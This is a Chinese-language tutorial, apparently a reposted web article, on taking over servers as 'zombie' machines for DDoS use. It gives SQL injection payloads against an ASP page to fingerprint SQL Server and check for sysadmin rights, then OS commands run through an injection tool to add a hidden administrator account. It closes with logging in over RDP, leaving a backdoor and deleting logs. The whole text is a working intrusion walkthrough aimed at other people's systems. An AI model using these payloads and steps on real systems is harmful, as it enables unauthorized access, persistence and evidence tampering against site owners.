即使捕獲了菜鳥的肉雞,質量也往往比較差,最多也可以做DDoS肉雞。筆者建議,如果用來學習操作或者研究,還是捕獲服務器肉雞比較好,因為它穩定、24小時在線、速度快……優點數不勝數。下面筆者就帶大家對一個站點進行測試。本文旨在拋磚引玉,希望與大家進行技術交流。
1.例如http://xxx.cn/news.asp?newsid=1289為我們要測試的地方(為了不必要的麻煩,地址用xxx來代替)。檢測注入漏洞是在網址後輸入“AND 1=1”正常頁面或“AND 1=2”不正常頁面。發現漏洞的過程我想大家都知道,這裡就不多說了。
2.接著我們來判斷數據庫的類型。在地址後面輸入:and (select count(*) from sysobjects)>0 也就是:http://xxx.cn/news.asp?newsid=1289 and (select count(*) from sysobjects)>0。
3.從圖1中可以看到頁面正常返回!接著在地址上輸入:and (select count(*) from msysobjects)>0。我們來看一下返回的情況,如圖2所示。
4.這樣,我們可以判斷,該數據庫是SQL Server。下面,在地址後面輸入這條命令:http://xxx.cn/news.asp?newsid=1289 and 1=(SELECT%20IS_SRVROLEMEMBER('sysadmin'))。Tw.WinGWit.CoM
5.這是判斷讀寫權限,頁面正常返回,如圖3所示。暈,居然是SA權限。拿出NB 聯盟注入工具來測試吧。操作比輸入代碼要簡單,也比較易懂。
6.在注入地址裡填上要注入的地址,在下面的DOS 命令中輸入“net user”查詢賬戶(圖4)。
7.接著,輸入“net user hsmw hsmw / add”添加 一個名字為 “hsmw”的賬號(圖5),再輸入“net localgroup administrators hsmw /add”把剛剛添加的hsmw 這個賬號(圖6),提升為管理員權限。
8.來看添加的效果。輸入“net user”,我們可以看到,多了一個 hsmw的 賬號。這說明添加賬號成功了(圖7)。
9.再進行簡單的掃描,看看開了3389端口沒有。太“不幸”了,居然開了3389。哈哈,直接用我們剛剛添加的賬號登錄,然後留後門並刪除日志。撤!
From:http://tw.wingwit.com/Article/Network/201309/1066.html